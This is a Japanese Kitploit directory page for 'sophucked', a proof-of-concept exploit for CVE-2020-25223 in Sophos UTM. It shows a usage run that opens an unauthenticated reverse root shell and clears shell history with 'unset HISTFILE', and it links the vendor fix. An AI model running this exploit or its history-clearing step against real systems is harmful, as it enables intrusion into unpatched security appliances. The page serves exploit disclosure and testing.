Skip to content
KitploitKITPLOIT
ツールブログ
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
sophucked — CVE-2020-25223 | Kitploit
ツール/GitHubGitHub/darrenmartyn/sophucked
脆弱性分析エクスプロイトウェブアプリケーション悪用ペネトレーションテストレッドチーミングリモートアクセスツール
GitHubdarrenmartyn/sophucked

sophucked

CVE-2020-25223

リポジトリを見る
1114年前未レビュー

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有

sophucked

CVE-2020-25223 RCE PoC、認証不要でリバースシェルを取得します。いくつかの脅威磁石を統合する必要があったため、これを迅速に実装しました。

使用例:

root@kitploit:~
# python sophucked.py https://x.x.x.x:4443 x.x.x.x 80
(+) starting handler on port 80
(+) Sending callback to x.x.x.x:80
(+) connection from x.x.x.x
(+) pop thy shell!
bash: no job control in this shell
utm:/var/confd # unset HISTFILE
unset HISTFILE
utm:/var/confd # id
id
uid=0(root) gid=0(root) groups=0(root)
utm:/var/confd # exit
exit
exit
*** Connection closed by remote host ***
# 

スキャン/検出

これは実装されていません。nucleiテンプレートを使用してください。

ポストエクスプロイテーションの注意点

これらにはPythonインタプリタがあり、実際には非常に充実したLinux環境が利用可能です。ポストエクスプロイテーションの可能性は素晴らしいです。

ブルーチーム向けメモ

関心のある誰かがこの部分を埋めてくれると思います。Bitter(「ブルーチームTwitter」のサブセット)がおそらくすぐにやってくれるでしょう。つまり、暗号化されていないリバースシェルがUnified Threat Managerボックスからビーコンを送信しているのを検出するのはそれほど難しいことではないでしょう?

バグの修正

誰か(おそらくSophos社から)がこれを送ってきました。公式の修正リンクです。UTMを更新してください。https://www.sophos.com/en-us/security-advisories/sophos-sa-20200918-sg-webadmin-rce

参考文献など

サードパーティの参考文献(バグ詳細):https://www.atredis.com/blog/2021/8/18/sophos-utm-cve-2020-25223

Sophos社に直接苦情を送ってください。21世紀になってまでPerlのopen()にユーザー入力を渡すことが良いアイデアだと考えたようです。

ツールをダウンロード